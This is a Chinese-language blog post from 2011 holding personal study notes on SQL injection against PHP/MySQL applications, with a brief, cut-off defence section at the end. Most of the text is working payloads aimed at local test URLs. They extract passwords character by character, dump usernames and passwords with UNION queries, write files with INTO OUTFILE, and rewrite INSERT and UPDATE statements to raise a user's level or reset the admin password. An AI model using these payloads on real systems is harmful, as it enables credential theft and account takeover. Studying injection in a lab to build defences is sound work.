日期:2011-11-10  浏览次数:20440 次

  今天从网上学习了有关SQL注入的基本技能。SQL注入的重点就是构造SQL语句,只有灵活的运用SQL

  语句才能构造出牛比的注入字符串。学完之后写了点笔记,已备随时使用。希望你在看下面内容时先了

  解SQL的基本原理。笔记中的代码来自网络。

  ===基础部分===

  本表查询:

  http://127.0.0.1/injection/user.php?username=angel' and LENGTH(password)='6

  http://127.0.0.1/injection/user.php?username=angel' and LEFT(password,1)='m

  Union联合语句:

  http://127.0.0.1/injection/show.php?id=1' union select 1,username,password from user/*

  http://127.0.0.1/injection/show.php?id=' union select 1,username,password from user/*

  导出文件:

  http://127.0.0.1/injection/user.php?username=angel' into outfile 'c:/file.txt

  http://127.0.0.1/injection/user.php?username=' or 1=1 into outfile 'c:/file.txt

  http://127.0.0.1/injection/show.php?id=' union select 1,username,password from user into outfile 'c:/user.txt

  INSERT语句:

  INSERT INTO `user` (userid, username, password, homepage, userlevel) VALUES ('', '$username', '$password', '$homepage', '1');

  构造homepage值为:http://4ngel.net', '3’)#

  SQL语句变为:INSERT INTO `user` (userid, username, password, homepage, userlevel) VALUES ('', 'angel', 'mypass', 'http://4ngel.net', '3’)#', '1');

  UPDATE语句:我喜欢这样个东西

  先理解这句SQL

  UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE id='$id'

  如果此SQL被修改成以下形式,就实现了注入

  1:修改homepage值为

  http://4ngel.net', userlevel='3

  之后SQL语句变为

  UPDATE user SET password='mypass', homepage='http://4ngel.net', userlevel='3' WHERE id='$id'

  userlevel为用户级别

  2:修改password值为

  mypass)' WHERE username='admin'#

  之后SQL语句变为

  UPDATE user SET password='MD5(mypass)' WHERE username='admin'#)', homepage='$homepage' WHERE id='$id'

  3:修改id值为

  ' OR username='admin'

  之后SQL语句变为

  UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE id='' OR username='admin'

  ===高级部分===

  常用的MySQL内置函数

  DATABASE()

  USER()

  SYSTEM_USER()

  SESSION_USER()

  CURRENT_USER()

  database()

  version()

  SUBSTRING()

  MID()

  char()

  load_file()

  ……

  函数应用

  UPDATE article SET title=DATABASE() WHERE id=1

  http://127.0.0.1/injection/show.php?id=-1 union select 1,database(),version()

  SELECT * FROM user WHERE username=char(97,110,103,101,108)

  # char(97,110,103,101,108) 相当于angel,十进制

  http://127.0.0.1/injection/user.php?userid=1 and password=char(109,121,112,97,115,115)http://127.0.0.1/injection/user.php?userid=1 and LEFT(password,1)>char(100)

  http://127.0.0.1/injection/user.php?userid=1 and ord(mid(password,3,1))>111

  确定数据结构的字段个数及类型

  http://127.0.0.1/injection/show.php?id=-1 union select 1,1,1

  http://127.0.0.1/injection/show.php?id=-1 union select char(97),char(97),char(97)

  猜数据表名

  http://127.0.0.1/injection/show.php?id=-1 union select 1,1,1 from members

  跨表查询得到用户名和密码

  http://127.0.0.1/ymdown/show.php?id=10000 union select 1,username,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1

  其他

  #验证第一位密码

  http://127.0.0.1/ymdown/show.php?id=10 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,1,1))=49

  ===注入防范===

  服务器方面

  magic_quotes_gpc设置为On

  display_errors设置为Of